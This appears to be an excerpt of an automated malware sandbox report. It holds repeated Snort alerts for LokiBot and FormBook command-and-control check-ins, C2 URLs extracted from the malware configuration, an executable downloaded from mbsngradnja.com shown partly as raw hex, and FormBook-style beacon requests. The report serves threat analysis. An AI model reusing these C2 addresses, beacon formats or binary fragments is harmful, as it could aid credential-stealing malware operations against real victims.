Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49763 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49764 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49764 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49764 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49764 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49765 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49765 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49765 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49765 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49766 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49766 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49766 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49766 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49767 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49767 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49767 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49767 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49768 -> 3.33.130.190:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49769 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49769 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49769 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49769 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49770 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49770 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49770 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49770 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49771 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49771 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49771 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49771 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49772 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49772 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49772 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49772 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49773 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49773 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49773 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49773 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49774 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49774 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49774 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49774 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49775 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49775 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49775 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49775 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49776 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49776 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49776 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49776 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49777 -> 34.132.146.171:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49778 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49778 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49778 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49778 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49779 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49779 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49779 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49779 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49780 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49780 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49780 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49780 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49781 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49781 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49781 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49781 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49782 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49782 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49782 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49782 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49783 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49783 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49783 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49783 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49784 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49784 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49784 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49784 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49785 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49785 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49785 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49785 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49786 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49786 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49786 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49786 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49787 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49787 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49787 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49787 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49788 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49788 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49788 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49788 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49789 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49789 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49789 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49789 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49790 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49790 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49790 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49790 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49791 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49791 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49791 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49791 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49792 -> 101.36.116.238:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49793 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49793 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49793 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49793 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49794 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49794 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49794 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49794 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49795 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49795 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49795 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49795 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49796 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49796 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49796 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49796 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49797 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49797 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49797 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49797 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49798 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49798 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49798 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49798 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49799 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49799 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49799 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49799 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49800 -> 91.195.240.19:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49801 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49801 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49801 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49801 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49802 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49802 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49802 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49802 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49803 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49803 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49803 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49803 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49804 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49804 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49804 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49804 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49805 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49805 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49805 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49805 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49806 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49806 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49806 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49806 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49807 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49807 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49807 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49807 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49808 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49808 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49808 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49808 -> 45.61.137.215:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor	URLs: http://45.61.137.215/index.php/3b1tenbkyj
Source: Malware configuration extractor	URLs: www.sukhiclothing.com/dn03/

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 29 May 2024 13:42:07 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Wed, 29 May 2024 07:28:27 GMTAccept-Ranges: bytesContent-Length: 616448Keep-Alive: timeout=5, max=100Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 df d7 56 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 50 09 00 00 16 00 00 00 00 00 00 1a 6e 09 00 00 20 00 00 00 80 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 09 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c8 6d 09 00 4f 00 00 00 00 80 09 00 dc 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 09 00 0c 00 00 00 98 4f 09 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 20 4e 09 00 00 20 00 00 00 50 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 dc 13 00 00 00 80 09 00 00 14 00 00 00 52 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 09 00 00 02 00 00 00 66 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc 6d 09 00 00 00 00 00 48 00 00 00 02 00 05 00 94 54 00 00 9c 50 00 00 03 00 00 00 26 00 00 06 30 a5 00 00 68 aa 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7e 02 28 1f 00 00 0a 00 00 02 72 01 00 00 70 7d 01 00 00 04 02 72 01 00 00 70 7d 02 00 00 04 2a 1e 02 7b 01 00 00 04 2a 22 02 03 7d 01 00 00 04 2a 1e 02 7b 02 00 00 04 2a 22 02 03 7d 02 00 00 04 2a 00 00 13 30 02 00 51 00 00 00 00 00 00 00 02 16 7d 03 00 00 04 02 16 7d 04 00 00 04 02 72 01 00 00 70 7d 05 00 00 04 02 72 01 00 00 70 7d 06 00 00 04 02 73 01 00 00 06 7d 07 00 00 04 02 73 0e 00 00 06 7d 08 00 00 04 02 14 7d 09 00 00 04 02 28 20 00 00 0a 00 00 02 28 0d 00 00 06 00 2a 0a 00 2a 13 30 04 00 ad 00 00 00 01 00 00 11 00 02 7b 0a 00 00 04 6f 21 00 00 0a 0a 16 0b 02 7b 0a 00 00 04 6f 22 00 00 0a 06 6f 23 00 00 0a 6f 24 00 00 0a 0c 16 0d 2b 1c 00 08 09 6f 25 00 00 0a 1f 20 fe 01 13 04 11 04 2c 05 00 09 0b 2b 14 00 09 17 58 0d 09 08 6f 26 00 00 0a fe 04 13 05 11 05 2d d5 07 16 fe 01 13 06 11 06 2c 22 00 02 7b 07 00 00 04 08 6f 03 00 00 06 00 02 7b 07 00 00 04 72 01 00 00 70 6f 05 00 00 06 00 00 2b 2b 00 02 7b 07 00

Source: global traffic	HTTP traffic detected: GET /YLc7afPlL4RjCeK.exe HTTP/1.1Host: mbsngradnja.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /dn03/?KvOx3=URhw1ZwvIctTGCpPzcTqZFryLoAICCIR37RdTq+D27m0Ed9BTUTA8R/QfR+xv6khW63w&LhEx=ODKXZDVpY2w8gpmp HTTP/1.1Host: www.imdcaam.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dn03/?KvOx3=rTguiTyPWe+LQ3wbOsvLrlRt5HkRD6mO+8zHcQ1TTPZ93ZKF8Svri6qQbYlnCi86X6wl&LhEx=ODKXZDVpY2w8gpmp HTTP/1.1Host: www.vivaness.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dn03/?KvOx3=JxIrrZbNPaA1C4PrhImOUNe+2n/09vmdrEF53puJ8yJ2Z/h/8YXf47jUpRM+pbGXlchT&LhEx=ODKXZDVpY2w8gpmp HTTP/1.1Host: www.servicepmgtl.worldConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dn03/?KvOx3=z1cSYSgDw8EovxWDbEjrEjmudKiJC5ObQGBfFhSW6JRqxrcowHK672c/PJOQREkPG+UN&LhEx=ODKXZDVpY2w8gpmp HTTP/1.1Host: www.sukhiclothing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dn03/?KvOx3=JJyTLDumWHTBkarN0VPanW2WZHOeobli2nsK+rVOrq2yAp2byhlCx/KUbNmL9DZVQlbp&LhEx=ODKXZDVpY2w8gpmp HTTP/1.1Host: www.banditsolana.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
